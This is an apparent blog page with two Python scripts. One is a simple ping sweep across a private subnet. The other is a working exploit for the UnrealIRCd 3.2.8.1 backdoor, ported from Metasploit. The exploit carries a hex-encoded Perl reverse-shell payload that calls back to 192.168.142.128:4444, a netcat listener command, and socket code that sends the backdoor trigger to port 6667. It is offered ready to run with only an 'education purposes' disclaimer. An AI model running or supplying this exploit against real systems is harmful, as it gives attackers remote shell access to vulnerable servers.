python

ping sweeping with python

This simple piece of script demostrates how to do a simple ping sweeping with python.

For some reasons, wordpress really messed up the identation…Still working on it…

import subprocess

host = "192.168.%d.%d" #change this
command = "ping -c 1 -w 1 %s"
result = list()

for x in range(188,189): #change this
for y in range (125,130): #change this
try:
run_this  = command % (host %(x,y))
output = subprocess.check_output(run_this, shell=True,stderr=subprocess.STDOUT)
result.append(host%(x,y))
print "Host %s is alive" % (host %(x,y))
except subprocess.CalledProcessError as e:
print "Host %s is not alive" % (host %(x,y))

print "===Done==="
if len(result):
print "There is %d host(s) alive" % len(result)
for re in result:
print re
else:
print "Found no alive host"
Advertisements

unreal IRCD 3.2.8.1 standalone exploit based on Metasploit

*All credit go to Rapid7

This is a Unreal IRCD 3.2.8.1 backdoor command execution, written in Python, based on an exploit of Metasploit Framework

You still need msfvenom to generate the payload.

This shit is too old to cause any real damage, but still —

—Disclaimer: For education purposes only. Use it at your own risk, don’t blame me for anything.


#Open a netcat listener before running this code: nc -nlvp 4444
#Or you can use exploit/multi/handler of metasploit framework
#to listen to the reverse shell

import sys,socket
target_ip="192.168.142.129" #change this
target_port=6667 #dont change this

#payload: cmd/unix/reverse_perl
#encoder:cmd/perl
#Change this payload before running this exploit
buf =""
buf += "\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20"
buf += "\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74"
buf += "\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61"
buf += "\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65"
buf += "\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24"
buf += "\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28"
buf += "\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b"
buf += "\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e"
buf += "\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74"
buf += "\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64"
buf += "\x64\x72\x2c\x22\x31\x39\x32\x2e\x31\x36\x38\x2e\x31"
buf += "\x34\x32\x2e\x31\x32\x38\x3a\x34\x34\x34\x34\x22\x29"
buf += "\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65"
buf += "\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66"
buf += "\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77"
buf += "\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24"
buf += "\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73"
buf += "\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27"

shellcode= buf

#TCP client
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

#connect client to target
client.connect((target_ip,target_port))

#send shellcode to target
client.send("AB;"+ shellcode +"\n")